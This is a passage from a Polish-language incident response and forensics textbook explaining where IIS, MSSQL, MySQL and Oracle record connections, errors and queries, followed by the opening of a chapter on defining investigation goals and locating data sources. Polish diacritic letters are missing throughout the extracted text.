inny. Na pocztku dziennika znajduj si informacje wstpne zaczynajce si od znaku kratki.
Mona w nich znale wersj IIS, dat rozpoczcia prowadzenia dziennika oraz spis rejestrowanych
pl. Dopiero za t sekcj znajduj si prawdziwe dania. Poniej przedstawiamy przykady wpisw
z dziennika IIS 8:
#Software: Microsoft Internet Information Services 8.0
#Version: 1.0
#Date: 2014-02-20 02:22:09#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query
s-port cs-username c-ip
cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2014-02-20 03:47:30 10.0.5.2 GET /download/2014021.txt - 80 - 172.24.13.37
Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+
Chrome/32.0.1700.107+Safari/537.36 http://localhost:80/ 200 0 0 94
Z powodu zawijania wierszy tego nie wida, ale powyszy przykad przedstawia pi wpisw.
Pierwsze cztery zaczynaj si kratk i zawieraj informacje dotyczce samego serwera IIS i formatu
dziennika. Pity wpis dotyczy dania GET adresu URL /download/20140221.txt wysanego przez
klienta o adresie IP 172.24.13.37. Opis wszystkich pl i metod wybierania, ktre maj by
rejestrowane, znajduje si na poniszej stronie.
W INTERNECIE
technet.microsoft.com/en-us/library/cc754702(v=ws.10).aspx
To wszystko, jeli chodzi o serwery. Teraz moemy przej do nastpnego zagadnienia, czyli
baz danych.
SERWERY BAZ DANYCH

Bazy danych s bardzo wanym skadnikiem w dziaalnoci prawie kadego nowoczesnego przedsibiorstwa.
Czasami ich obecno nie jest oczywista, poniewa mog by zintegrowane z innym produktem bez uycia
specjalnego serwera. Spotykalimy si nawet z sytuacjami, gdy klient nie wiedzia, e jego system wykorzystuje
baz danych. Jednak hakerzy z pewnoci nie przeocz tego szczegu, jeli tego wanie bd szuka.
W prowadzonych przez nas ledztwach odkrylimy kilka typowych rde dowodw w bazach danych.
Dzienniki pocze klientw wikszo baz danych rejestruje, kiedy klient prbuje
nawiza poczenie, i zapisuje dat, godzin oraz adres IP. Informacje te pomagaj
w znajdowaniu odpowiedzi na pytania typu: Czy haker czy si z t baz danych?.
Dzienniki bdw dzienniki bdw rwnie s powszechne i najczciej zawieraj
informacje o nieprawidowych zapytaniach, awariach bazy danych, przypadkach naruszenia
bezpieczestwa i innych wanych bdach. Jeli haker sprbuje wama si na si do bazy
danych, dzienniki bdw bd zawieray wiele cennych informacji na ten temat.
Dzienniki zapyta podstawow funkcj bazy danych jest obsugiwanie zapyta
dotyczcych zawartego w niej zbioru danych. Wikszo baz danych ma moliwo
zapisywania wszystkich zapyta w dzienniku, cho ze wzgldw wydajnociowych funkcja
ta czsto jest wyczana. W dziennikach zapyta mona znale zapytania wykonane przez
hakera, co pozwala ustali, jakie byy jego intencje.
Magazyn bazy danych wikszo systemw baz danych zapisuje dane w kilku plikach.
Czasami w ramach ledztwa konieczne jest zapisanie kopii bazy danych przez skopiowanie
skadajcych si na ni plikw. Jednak nie zawsze jest to takie proste. Niektre systemy
wykorzystuj surowe metody przechowywania danych s to wasnociowe techniki
zarzdzania jednym urzdzeniem magazynowym na poziomie fizycznym lub wiksz ich liczb.
Baz danych i wspomagajce j systemy mona w duym stopniu dostosowywa, jeli wic
potrzebne bd kopie dziennikw lub samego magazynu danych, najlepiej porozumie si
z administratorami lokalnej bazy danych i systemu.
Najbardziej skomplikowan czynnoci w odniesieniu do baz danych i reakcji na incydenty
z nimi zwizane jest analizowanie samej bazy danych. Najlepiej nie robi tego w systemie
produkcyjnym, poniewa istnieje due ryzyko zmodyfikowania dowodw i uszkodzenia czego.
Najlepszym rozwizaniem jest uruchomienie kopii caej bazy danych na osobnym systemie.
Opisujemy tu trzy najczciej spotykane rodzaje baz danych: Microsoft SQL, MySQL oraz
Oracle. Ostrzegamy jednak, e taka wiedza o bazach danych wystarcza tylko do tego, by robi
niebezpieczne rzeczy. Zalecamy poszerzenie wiedzy na ten temat we wasnym zakresie
i wspprac z dowiadczonym administratorem baz danych. Opisywane systemy baz danych
mona pobra w celach testowych z podanych poniej stron.
W INTERNECIE
Microsoft SQL Express www.microsoft.com/en-us/sqlserver/editions/2012-editions/express.aspx
Oracle www.oracle.com/technetwork/database/enterprise-edition/downloads/index.html
MySQL dev.mysql.com/downloads/mysql
Jest kilka dobrych miejsc, od ktrych mona zacz zdobywanie wiedzy na temat baz danych
pod ktem prowadzenia ledztw i ekspertyz. Przede wszystkim warto poszuka za pomoc
wyszukiwarki internetowej fraz typu <nazwa bazy danych> forensics. W miejsce napisu <nazwa
bazy danych> naley wstawi np. nazw Oracle lub nazw dowolnego innego systemu. W ten
sposb mona znale artykuy z blogw, biae ksigi i ksiki idealne dla pocztkujcych.
Poniej przedstawiamy kilka zasobw, ktre naszym zdaniem s szczeglnie wartociowe.
W INTERNECIE
www.blackhat.com/presentations/bh-usa-07/Fowler/Presentation/bh-usa-07-fowler.pdf
www.davidlitchfield.com/security.htm
airccse.org/journal/cseij/papers/2312cseij03.pdf
Osobom zainteresowanym dogbnym zbadaniem tematu baz danych i informatyki ledczej

polecamy ksik SQL Server Forensic Analysis Kevviego Fowlera.
Teraz przyjrzymy si bliej trzem bazom danych wymienionym wczeniej, czyli Microsoft SQL,
Oracle i MySQL. Dowiesz si, gdzie szuka dziennikw pocze, bdw i zapyta oraz gdzie
na dysku kady system przechowuje dane. Zaczniemy od bazy Microsoft SQL.
Microsoft SQL
Baza danych Microsoft SQL (w skrcie zwana MSSQL) jest popularnym rozwizaniem
komercyjnym. Firma Microsoft udostpnia zarwno patn, jak i bezpatn wersj tego produktu.
Wersja darmowa nazywa si SQL Server Express. Obie maj bardzo podobne moliwoci, ale
wersja Express ma pewne ograniczenia, np. znacznie mniejszy maksymalny rozmiar bazy danych
i poziom uycia pamici. Wikszo opcji konfiguracyjnych bazy MSSQL ustawia si i przeglda
w programie Microsoft SQL Server Management Studio (SSMS), ktry jest dostpny i w wersji
patnej, i darmowej.
Baza danych MSSQL domylnie nie prowadzi archiwum pocze z klientami i rejestruje tylko
przypadki nieudanych prb poczenia. Aby wczy rejestracj take udanych pocze, naley
poczy si z programem SSMS, klikn prawym przyciskiem myszy serwer w eksploratorze
obiektw i wybra pozycj Properties (waciwoci). Nastpnie naley przej na stron Security
(bezpieczestwo) i w sekcji Login Auditing (inspekcja logowa) zaznaczy opcj Both Failed and
Successful Logins (zarwno udane, jak i nieudane logowania). Dane dotyczce logowania s
zapisywane w pliku o nazwie ERRORLOG w katalogu Log instancji serwera SQL. Domylna
lokalizacja tego pliku na serwerze SQL Server 2012 to: C:\Program Files\Microsoft SQL Server\
MSSQL11.MSSQLSERVER\MSSQL\Log\ERRORLOG. Plik ERRORLOG dodatkowo zawiera dane
dotyczce bdw serwera MSSQL. Wicej informacji o sposobach sprawdzania, gdzie MSSQL
przechowuje pliki, take ERRORLOG, mona znale na stronach podanych poniej.
W INTERNECIE
technet.microsoft.com/en-us/library/ms143547.aspx
support.microsoft.com/kb/966659
Poniej znajduj si przykadowe wpisy z dziennika ERRORLOG informujce o nieudanej

i udanej prbie nawizania poczenia. Bdy dotycz uytkownika o nazwie sa
(administrator systemu), ktry z reguy ma peny dostp do systemu baz danych:
2014-02-20 23:03:45.83 Logon Error: 18456, Severity: 14, State: 8.2014-02-20
23:03:45.83 Logon Login failed for user 'sa'. Reason:
Password did not match that for the login provided. [CLIENT: 192.168.200.2]
2014-02-20 23:03:48.77 Logon Login succeeded for user 'sa'.
Connection made using SQL Server authentication. [CLIENT: 192.168.200.2]
Ewentualnie w programie SSMS mona skierowa zdarzenia logowania do dziennika

zabezpiecze systemu Windows lub aplikacji to moe by lepsze rozwizanie, poniewa plik
ERRORLOG podlega rotacji w chwili uruchamiania serwera SQL.
Gdy wiadomo, kiedy dany uytkownik poczy si z baz danych, nastpnym krokiem jest
dowiedzenie si, co zrobi. Jeeli haker kradnie dane przez poczenie SQL, prawie na pewno
wykonuje polecenia SELECT. Serwer MSSQL, podobnie jak wikszo innych systemw baz danych,
domylnie nie zapisuje w dzienniku zapyta SQL. Najprostszym sposobem na rejestrowanie
zapyta SELECT jest uycie tzw. techniki ledzenia na serwerze. Trzeba jednak z ni uwaa,
poniewa moe ona znacznie obcia ca baz danych. Poniej podajemy odnonik do wietnego
artykuu zawierajcego szczegowe objanienie sposobu konfiguracji ledzenia na serwerze
i przegldania jego wynikw.
W INTERNECIE
blogs.msdn.com/b/sreekarm/archive/2009/01/05/auditing-select-statements-in-sql-server-2008.aspx
Czasami trzeba skopiowa pliki bazy danych podczas jej dziaania. Normalna procedura polega
na utworzeniu obrazu ledczego dysku wraz z plikami bazy danych. Pliki zawierajce tre bazy
danych MSSQL maj rozszerzenia .mdf i .ldf. MDF to podstawowy rodzaj plikw bazy danych,
a pliki LDF zawieraj dane dziennika transakcji. Wszystkie one s przechowywane w katalogu
o nazwie Data, w katalogu instancji serwera MSSQL. Podczas dziaania instancji bazy danych
pliki s zablokowane i nie mona ich skopiowa w normalny sposb. Jeli nie ma moliwoci
zatrzymania instancji, mona wykona kopi zapasow lub wyeksportowa dane za pomoc
programu SSMS ale moliwo t naley traktowa jako ostatni desk ratunku, poniewa
technika ta stwarza wiksze ryzyko zmodyfikowania dowodw.
MySQL
MySQL to bardzo popularna baza danych dostpna dla systemw Linux, Unix i Windows. Jej plik
konfiguracyjny, najczciej o nazwie my.cnf lub my.conf, zawiera ustawienia dotyczce rejestracji
danych, miejsca przechowywania dziennikw oraz lokalizacji magazynu. Najczciej mona go
znale w katalogu /etc, /etc/mysql lub w podkatalogu tych katalogw o nazwie /usr/local.
W poniszej tabeli przedstawiono wane dla nas ustawienia konfiguracyjne.
Dyrektywa Opis
log_error Pena cieka i nazwa dziennika bdw
general_log_file Pena cieka i nazwa dziennika oglnej aktywnoci, w ktrym zapisywane
s takie zdarzenia jak poczenia klientw i zapytania
general_log Warto logiczna wczajca lub wyczajca general_log_file
(1 oznacza wczenie, 0 oznacza wyczenie)
datadir Katalog, w ktrym przechowywane s pliki z danymi bazy danych MySQL
W systemie Linux typowym miejscem przechowywania dziennikw jest katalog /var/log/mysql.

W wikszoci domylnych instalacji bazy danych MySQL wczony jest tylko dziennik bdw.
Zawiera on wykaz wszystkich bdw krytycznych i wanych zdarze, takich jak np. uruchomienie
i wyczenie serwera lub awaria albo wadliwe dziaanie bazy danych. Najcenniejsze informacje
znajduj si w dzienniku oglnym, cho jego zapisywanie jest pracochonne, przez co moe
negatywnie wpywa na wydajno bazy danych. Poniej znajduje si przykad wpisu z tego
dziennika dla polecenia SELECT:
140220 20:14:03 12583 Connect root@192.168.200.2 on cards
12583 Query select * from cc_data limit 1
Z wpisu tego wynika, e 20 lutego 2014 roku o godzinie 20:14:03 uytkownik bazy danych root
poczy si z serwerem z adresu 192.168.200.2, uy bazy danych o nazwie cards i wykona
nastpujce zapytanie SQL:
select * from cc_ data limit 1
Wicej informacji na temat dziennikw serwera MySQL i oglnego dziennika zdarze mona
znale na podanych poniej stronach internetowych.
W INTERNECIE
dev.mysql.com/doc/refman/5.6/en/server-logs.html
dev.mysql.com/doc/refman/5.6/en/query-log.html
Pliki danych MySQL s przechowywane w katalogu wskazanym w dyrektywie konfiguracyjnej

datadir. Serwer MySQL moe wykorzystywa kilka formatw plikw danych, ale najczciej
spotykamy formaty MyISAM i InnoDB. Jeeli trzeba zdoby kopie plikw bazy danych MySQL,
najlepszym sposobem jest eleganckie wyczenie usugi na pewien czas i wykonanie obrazu.
W dziaajcym systemie najlepszym rozwizaniem jest wykonanie kopii zapasowej za pomoc
polecenia mysqldump. Szczegowy opis tego polecenia i przykady jego uycia mona znale
w witrynie bazy danych MySQL.
W INTERNECIE
dev.mysql.com/doc/refman/5.6/en/mysqldump.html
Oracle
Baza danych Oracle to kolejna komercyjna baza danych, ktr czsto spotykamy w prowadzonych
ledztwach. Jest ona dostpna dla systemw Windows, Linux i kilku platform uniksowych. Istnieje
te darmowa wersja tej bazy danych o ograniczonej licencji, przeznaczona do celw testowych.
Zobaczmy, co mona znale w jej dziennikach pocze z klientami, bdw i zapyta oraz jak
dosta si do plikw z danymi.
Do obsugi pocze bazy danych Oracle wykorzystuj modu nasuchowy TNS (ang. Transparent
Network Substrate). Domylnie tworzy on dziennik z informacjami o kadym poczeniu z klientem
podkrelamy, e chodzi o poczenia, nie uwierzytelnienia. Dziennik ten ma nazw listener.log
i w Oracle 12c mona go znale w katalogu instalacyjnym aplikacji Oracle w podkatalogu
diag\tnslsnr\<nazwa instancji>\listener\trace\listener.log. Ponadto modu TNS prowadzi dziennik
alarmw w formacie XML o nazwie log.xml, ktry w Oracle 12c mona znale w katalogu
diag\tnslsnr\<nazwa instancji>\listener\alert\log.xml. Dziennik alarmw zawiera odniesienia
do ledze i zrzutw, jeli takie istniej. Poniej znajduje si przykad udanego poczenia z baz
danych Oracle 12c:
11-FEB-2014 12:29:04 * (CONNECT_DATA=(SID=testdb)(CID=(PROGRAM=JDBC Thin Client)
(HOST=__jdbc__)(USER=Bob))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.200.2)
(PORT=60866)) * establish * testdb * 0
W zdarzeniu tym nawizano poczenie z moduem TNS z adresu IP 192.168.200.2. Wartoci

PROGRAM, HOST i USER zostay podane przez klienta bazy danych, ktry zainicjowa poczenie.
Nazwa uytkownika to nie ta nazwa, ktrej klient uy w celu zalogowania si, tylko nazwa
w zdalnym systemie (tu: Bob). Dziennik zdarze listener.log nie zawiera informacji o tym, czy
uwierzytelnianie powiodo si, czy nie. Mona z niego dowiedzie si tylko o tym, e doszo do
prby nawizania poczenia. Aby dodatkowo dowiadywa si, czy uwierzytelnianie si powiodo
i jaka jest nazwa uytkownika, naley wczy funkcj inspekcji w systemie.
Do rejestrowania szczegw pocze i zapyta wymagana jest funkcja inspekcji Oracle.
Podobnie jak w innych systemach baz danych, rzadko spotykamy si z jej wczeniem ze wzgldu
na powodowane przez ni obcienie systemu. Inspekcja w Oracle jest skomplikowana, a moliwoci
i procedury w kadej wersji bazy danych s inne. Poniewa nie moemy w jednej ksice opisa
wszystkiego, postanowilimy w ogle szczegowo nie opisywa tego zagadnienia. Jeli jednak
kogo to interesuje, warto zajrze na strony dokumentacji Oracle podane poniej. Ponadto zalecamy
poradzenie si dowiadczonego administratora baz danych Oracle.
W INTERNECIE
docs.oracle.com/cd/E16655_01/server.121/e17609/tdpsg_auditing.htm#TDPSG50000
docs.oracle.com/cd/E16655_01/network.121/e17607/toc.htm
Pliki bazy danych Oracle znajduj si w katalogu o nazwie ORACLE_BASE\oradata\. Warto

czonu ORACLE_BASE jest zdefiniowana w konfiguracji Oracle. W systemie Windows ustawienie
ORACLE_BASE znajduje si w gazi rejestru HKEY_LOCAL_MACHINE\SOFTWARE\Oracle.
Klucz ORACLE_BASE jest przechowywany w podkluczu odpowiadajcym wersji bazy danych

(np. Oracle 12c uywa podklucza KEY_OraDB12Home1). W systemach Linux i rnych wariantach
Uniksa katalog ORACLE_BASE jest najczciej zdefiniowany jako zmienna rodowiskowa uytkownika,
na ktrego koncie dziaa baza danych np. plik /home/oracle/.bash_profile moe zawiera linijk
export ORACLE_BASE=/u01/app/oracle. Kada instancja bazy danych przechowuje swoje pliki
w podkatalogu katalogu oradata o nazwie odpowiadajcej nazwie instancji. Ponadto mona poszuka
plikw z rozszerzeniem .dbf, ktre jest domylnie stosowane w plikach bazy danych Oracle.
Wicej informacji na temat tych plikw mona znale na podanej poniej stronie internetowej.
W INTERNECIE
docs.oracle.com/cd/E16655_01/install.121/e17735/startrdb.htm
I CO Z TEGO
Aby skutecznie wytropi hakera i pozna jego zamiary, trzeba przewietli cae przedsibiorstwo.
Usugi wykorzystywane przez firmy generuj dzienniki, ktre mog by bardzo pomocne w ledztwie.
Warto znale je wszystkie bezpieczestwo przede wszystkim. Naley dowiedzie si, ktre
z nich mog dostarczy cennych informacji, a nastpnie opracowa centralne metody zbierania,
analizy i wyszukiwania dowodw. Stosujc takie perspektywiczne podejcie, mamy przewag
nad przeciwnikiem dziki cisej wsppracy z dziaami organizacji odpowiedzialnymi za badanie
i wdraanie nowych technologii.
PYTANIA
1. Wymie kilka sposobw wykrywania usug i aplikacji, ktre mog by pomocne w ledztwie.
2. Czy usugi sieciowe, takie jak DHCP, s niezbdne do skutecznej reakcji na incydent?
Jeli nie mamy dostpu do dziennikw DHCP, jakie s inne sposoby na sprawdzenie,
jaki adres IP mia dany system?
3. W Twojej firmie wdroono niedawno now aplikacj. Jest to narzdzie do odzyskiwania
sprawnoci po katastrofie, ktre automatycznie wykonuje kopi zapasow danych
z systemw uytkownikw i zapisuje j na serwerze centralnym. Kopie podlegaj
szyfrowaniu, ale aplikacja prowadzi lokalny dziennik w formacie tekstowym. W czym
usuga ta mogaby by przydatna dla ledczych?
4. W rozdziale tym napisalimy o moliwoci uruchomienia kopii obrazu ledczego.
Co mielimy na myli? Opisz narzdzia i metody potrzebne do wykonania tego zadania.
CZ IV
Analiza danych
ROZDZIA 11.
Metody analizy
Z
nany popularyzator nauki Neil deGrasse Tyson kiedy powiedzia: Nauka wyposaa Ci
w narzdzia pozwalajce prawidowo interpretowa to, co si dzieje przed Tob.
Specjalicie w dziedzinie reagowania na incydenty bezpieczestwa komputerowego,
informatyki ledczej i bezpieczestwa komputerowego trudno zanegowa znaczenie nauki.
Nasze dziedziny si na niej opieraj. Musimy wic, by wypenia swoje obowizki, rozumie,
akceptowa i wykorzystywa nauk wraz z jej instrumentami.
Planujc analiz nowych danych, zawsze przeprowadzamy oglny proces przypominajcy
metod naukow. Oto on.
1. Definicja celw i ich dogbne zrozumienie.
2. Pozyskanie danych.
3. Wstpna ocena jakoci danych.
4. Przeprowadzenie niezbdnych konwersji lub normalizacji.
5. Wybr metody.
6. Analiza.
7. Ocena wynikw.
Proces ten mona powtarza dla jednego zbioru danych tyle razy, ile trzeba, aby otrzyma
dobre odpowiedzi. Innymi sowy, jest to proces iteracyjny. Zalecamy jego przeprowadzanie zawsze
po otrzymaniu nowych danych niezalenie od tego, czy jest to may plik tekstowy, czy kilka
terabajtw dziennikw serwerowych, potencjalnie szkodliwy plik, obraz dysku twardego lub co
kompletnie nieznanego. Postpowanie zawsze w taki sam sposb daje gwarancj koncentracji oraz
otrzymywania dokadnych i spjnych wynikw. Mamy nadziej, e informacje przekazane przez
nas w tym rozdziale pomog Ci lepiej interpretowa to, co si dzieje przed Tob w toku ledztwa.
DEFINICJA CELW
Wikszo z nas rozumie, e jasno postawione cele zazwyczaj pozwalaj uzyska lepsze wyniki,
bez wzgldu na to, co si robi. Zdefiniowanie jakichkolwiek celw to nie problem, ale okrelenie
prawidowych celw to nie lada wyzwanie. Aby dziaa skutecznie, trzeba mie doskonae oglne
rozeznanie w sytuacji, a take wietnie zna zaangaowane technologie. Czego chcesz si dowiedzie?
Czy da si wycign ostateczne wnioski ze znanych do tej pory faktw? Ile czasu to zajmie?
Co do tego bdzie potrzebne? Kogo interesuj wyniki Twojej pracy? Co osoby te z nimi zrobi?
Musisz dobrze rozumie te pytania, zanim przystpisz do analizy.
Wanym krokiem w tym procesie jest identyfikacja (lub wyznaczenie) osoby, ktra wyznaczy
cele. Cho moe si to wydawa mao wane, w istocie etap ten czasami ma decydujcy wpyw
na powodzenie operacji. Nastpnym krokiem jest poinformowanie wszystkich czonkw zespou
o swojej decyzji. Zaniechanie tego moe przyczyni si do powstania chaosu komunikacyjnego
i utraty koncentracji, co powanie utrudnia ledztwo.
ROZDZIA 11. METODY ANALIZY 273
W terenie
Jeli chodzi o cele, nie daj si namwi na udowadnianie jakiego negatywnego stwierdzenia.
Zamiast tego skoncentruj si na czym pozytywnym i realistycznym. Przykadowo kto moe
Ci poprosi o udowodnienie, e zabezpieczenia systemu nie zostay zamane. W wikszoci
przypadkw jest to bardzo trudne lub wrcz niemoliwe ze wzgldu na brak dostpu do
wszystkich potrzebnych informacji. Tylko nieliczne systemy przechowuj kompletne rejestry
wszystkich wykonywanych czynnoci, ktre mona w razie potrzeby przejrze. Poza tym
dowody mog by przechowywane za krtko ilo miejsca na dzienniki jest ograniczona,
usuwane pliki s nadpisywane itd. Dlatego jest wysoce prawdopodobne, e przynajmniej
niektre dowody nigdy nie istniay lub zostay z czasem utracone. Przyjmujc, e w uyciu
s poprawne wskaniki zagroenia, mona wyrazi opini, e system prawdopodobnie jest
bezpieczny ale nie ma co do tego absolutnej pewnoci. Na poparcie swojej tezy masz wyniki
przeprowadzonych analiz, ktre nie wykazay adnych ladw szkodliwej aktywnoci.
Cele ledztwa najczciej definiujemy w postaci serii pyta. Nastpnie czytamy kade pytanie
i zastanawiamy si, jakie s szanse znalezienia na nie odpowiedzi. W niektrych przypadkach
znalezienie odpowiedzi jest niemoliwe, jeli nie wprowadzi si pewnych ogranicze. Przykadowo
pytanie: Czy w komputerze znajduje si szkodliwy program?, wydaje si proste, ale w rzeczywistoci
bardzo trudno na nie odpowiedzie. Mona powici mnstwo czasu i wysiku na poszukiwanie
szkodliwych programw, a i tak nie ma si pewnoci, e co nie zostanie przeoczone. W konsekwencji
analiza sprowadza si do wykonania krtkiej listy czynnoci pozwalajcych odpowiedzie na pytanie
z du doz pewnoci. Akcjonariusze musz zdawa sobie spraw, e w takich sytuacjach nie ma
adnych gwarancji. Na niektre pytania mona udzieli bardziej konkretnej odpowiedzi. I tak
na pytanie: Czy w systemie plikw komputera znajduje si aktywny plik o skrcie MD5
d41d8cd98f00b204e9800998ecf8427e?, mona odpowiedzie z du pewnoci po wykonaniu
krtkiej analizy. Wystarczyoby obliczy skrt MD5 kadego pliku w systemie i sprawdzi, czy
ktry z nich jest taki sam jak szukany. Najwaniejsze jest, aby przejrze wszystkie pytania razem
z klientem i przedstawi mu propozycje rozwiza. Wtedy klient bdzie mia wiadomo,
czego moe si spodziewa po odpowiedziach i ile wysiku wymaga ich znalezienie.
Jak si pewnie domylasz, wanym czynnikiem, jaki naley bra pod uwag przy definiowaniu
celw, jest zakres. Jeli chcesz wykona najlepsz moliw analiz, musisz dobrze rozumie jej zakres.
Gdy kto poprosi Ci o przyjrzenie si dyskowi twardemu, raczej nie ma na myli drobiazgowego
przeanalizowania kadego bitu w celu dowiedzenia si, co znaczy. Taka analiza zajaby na pewno
duo wicej czasu i pochonaby wicej pienidzy, ni mogaby sobie pozwoli wikszo firm.
Twoim zadaniem jest skoncentrowanie si na tym, co najwaniejsze. Wanym aspektem celw
ledztwa jest z pewnoci poczta e-mail, ale jeli kto kae nam przejrze wszystkie e-maile, to te
trudno mwi o koncentracji i konkretach. W takim przypadku naley postara si ograniczy
zakres zadania do bardziej konkretnej postaci, np.: Przejrzyj wszystkie aktywne pliki .pst z poczty
Bartka Kowalskiego otrzymanej w cigu ostatniego miesica. Musisz jak dziecko cigle pyta,
dlaczego. Jeeli odpowied nie ma sensu, zadaj wicej pyta. Zadawaj pytania, a w kocu
dojdziesz z klientem do porozumienia w kwestii zakresu analizy do wykonania.
Obowizek zdefiniowania celw moe spa na analityka, poniewa pracownicy organizacji
nie s specjalistami w tym zakresie i mog nie wiedzie, co jest wykonalne, a co nie. Moesz na
podstawie posiadanych informacji powiedzie, jakie Twoim zdaniem powinny by podstawowe
cele. Zawsze wysuchuj pyta osoby odpowiedzialnej za definiowanie celw, aby umoliwi jej
zrozumienie sytuacji. Moe te si zdarzy, e odpowiedzialno nie bdzie spoczywa tylko
na jednej osobie i wwczas bdziesz w zasadzie swoim wasnym szefem. W takich przypadkach
musisz oprze si pokusie pjcia na atwizn, bo potem moe nie by odwrotu. Zamiast tego
zastanw si, co jest najwaniejsze w danej sytuacji.
ZAPOZNANIE SI Z DANYMI
Systemy informatyczne mog przechowywa dane w wielu formatach i miejscach. Zanim przystpisz
do analizy, a nawet zanim wybierzesz metod, musisz zbada potencjalne rda informacji i ustali,
jak si nimi posugiwa. W podrozdziale tym opisujemy rda i formaty danych.
Jednym z zada podczas ledztwa jest gromadzenie danych, ktre pniej si analizuje w celu
znalezienia odpowiedzi na postawione na pocztku pytania. Aby zwikszy swoje szanse na powodzenie,
naley zbiera te dane, ktre bd przydatne w dochodzeniu. Wiedza o istniejcych rdach danych
i ich zawartoci umoliwia podjcie decyzji, skd czerpa informacje. Zajrzyj do inwentarza rde
danych utworzonego w ramach przygotowa do ewentualnego incydentu opisanych w rozdziale 3.
Uwaga Czsto syszymy stwierdzenia typu: Technologia tak szybko si zmienia, e za ni nie nadam.
Jednak, cho na zewntrz moe si wydawa, e nastpiy due zmiany, podstawowe technologie
s do stabilne. Dlatego zachcamy do poznawania podstaw. Dziki temu Twoja wiedza oprze si
upywowi czasu.
Miejsca przechowywania danych

Najpierw przyjrzymy si siedmiu najczciej uywanym miejscom do przechowywania danych.
W odniesieniu do tego kontekstu sowo dane ma bardzo szerokie znaczenie i obejmuje pliki
systemu operacyjnego, aplikacje, bazy danych oraz dane uytkownikw.
Komputery stacjonarne i laptopy komputery stacjonarne i laptopy to fizyczne maszyny
wykorzystywane do prowadzenia codziennej dziaalnoci gospodarczej. Najczciej znajduj
si na biurku pracownika lub w jakim obszarze roboczym. System taki zawiera zwykle
jeden lub wicej dyskw twardych z systemem operacyjnym, aplikacjami i danymi. Dane
mog by te przechowywane na noniku zewntrznym podczonym bezporednio lub
przez sie komputerow.
W dzisiejszych komputerach mona te stosowa wirtualizacj. Do wirtualnych pulpitw mona

uzyska dostp przez terminal pozbawiony lokalnego magazynu danych i zapewniajcy tylko
zdalny dostp do systemu. Pulpit wirtualny z reguy uruchamia si w centralnej infrastrukturze
wirtualizacji. W ten sposb rozwizanie przechowywania danych staje si scentralizowane.
Serwery systemy serwerowe zapewniaj z reguy podstawowe usugi biznesowe
i infrastrukturalne. Najczciej mona je znale w centrach danych, serwerowniach
i pomieszczeniach komunikacyjnych. Systemy serwerowe mog wygldem przypomina
komputery stacjonarne i laptopy, ale najczciej s to specjalne jednostki montowane
na regaach serwerowych. Kady normalny serwer ma przynajmniej jeden dysk twardy
na system operacyjny, ale liczba ta moe by te wiksza, jeli trzeba przechowywa duo
danych lub aplikacji. Czasami dane i aplikacje przechowuje si wycznie na zewntrznych
nonikach. Dotyczy to szczeglnie serwerw wirtualnych, ktre s z reguy skupione
w wirtualnej infrastrukturze serwerowej.
Urzdzenia przenone urzdzenia przenone to niewielkie przenone komputery
z moliwoci czenia si z sieci. Zaliczaj si do nich telefony komrkowe, PDA, tablety
i komputery do noszenia na sobie. Prawie wszystkie urzdzenia przenone maj stosunkowo
niewielk ilo pamici wbudowanej, najczciej w formie nieulotnej pamici flash. Ponadto
wiele z nich ma rne gniazda rozszerze, do ktrych mona podczy dodatkowe noniki
danych, i interfejsy pozwalajce na czenie ich z zewntrznymi magazynami danych.
Magazyny danych i noniki w prawie kadym rodowisku mona znale pamici USB,
dyski twarde USB oraz pyty CD i DVD. Zarwno w maych biurach, jak i rednich oraz
duych przedsibiorstwach wykorzystuje si sieciowe wsplne magazyny danych, takie
jak urzdzenia magazynujce doczone do sieci (NAS) czy sieci magazynowania (SAN).
W rodowiskach, w ktrych wykorzystywane s rozwizania NAS lub SAN, zazwyczaj
konieczna jest wsppraca z pracownikami firmy, poniewa technologie te bywaj bardzo
skomplikowane w obsudze.
Urzdzenia sieciowe wikszo dzisiejszych rodowisk zawiera takie urzdzenia jak zapory
sieciowe, przeczniki i routery. Cho urzdzenia te nie s przeznaczone do przechowywania
danych, mog zawiera dane konfiguracyjne i dzienniki o wielkim znaczeniu dla ledztwa.
Usugi chmurowe w tym kontekcie usuga chmurowa to zewntrzna usuga sieciowa
umoliwiajca przechowywanie aplikacji i danych firmy. Usugi te w biznesie najczciej
wykorzystuje si do przechowywania poczty elektronicznej, harmonogramw, list pac
i danych zasobw ludzkich. Istnieje te wiele usug tego typu do zastosowa osobistych,
np. Dropbox i Google Drive.
Kopie zapasowe kopie zapasowe zawieraj wane dane i najczciej stanowi element
oglnej strategii dziaania na wypadek katastrofy. Pliki te mona przechowywa w posiadanych
magazynach danych i na nonikach, ale kompletna strategia musi uwzgldnia take
przechowywanie danych poza siedzib firmy. Kopie zapasowe zazwyczaj podlegaj
regularnej rotacji na zewntrz firmy. Do ich przechowywania mona wykorzystywa
powszechnie spotykane noniki, takie jak dyski USB czy pyty DVD, ale najczciej uywa
si nonikw tamowych. Dostpne s te chmurowe narzdzia do obsugi kopii
zapasowych przeznaczone dla klientw indywidualnych, np. Carbonite i Mozy.
Co jest dostpne
Oglnie rzecz biorc, dowody mogce znajdowa si w opisanych powyej miejscach mona podzieli
na cztery kategorie. Kada z nich jest bardziej szczegowo opisana w dalszych rozdziaach tej ksiki.
System operacyjny do kategorii tej zaliczaj si systemy plikw, np. NTFS i HFS+,
informacje dotyczce stanu, np. o dziaajcych procesach i otwartych portach sieciowych
(pami), dzienniki systemu operacyjnego i inne dane systemowe. W systemie Windows
mona jeszcze znale rejestr, w systemie Unix syslog, a w Apple OS X pliki list waciwoci
(plist). Narzdzia ledcze mog analizowa zawarto systemw plikw i sporzdza listy
plikw wraz z nazwami, ciekami, rozmiarami i znacznikami czasu.
Systemy plikw mog by niezalene od systemu operacyjnego i kady z nich ma wasne
charakterystyczne cechy. Pamitaj, e wiele koncepcji dotyczcych magazynowania danych
odnosi si wanie do systemw plikw, takich jak np. jednostki alokacji, aktywne pliki,
usunite pliki, znaczniki czasowe, nieprzydzielona (wolna) przestrze czy tabele partycji.
Kady system plikw ma dodatkowo pewne typowe cechy, dane i artefakty (np. znaczniki
czasu plikw w systemie NTFS, strumienie NTFS, i-wzy UFS, rozwidlenia zasobw HFS
oraz tablice alokacji w systemach plikw FAT12, FAT16 i FAT32). Fantastycznym rdem
informacji na temat metod analizy systemw plikw jest ksika File System Forensic
Analysis Briana Carriera (Addison-Wesley Professional, marzec 2005).
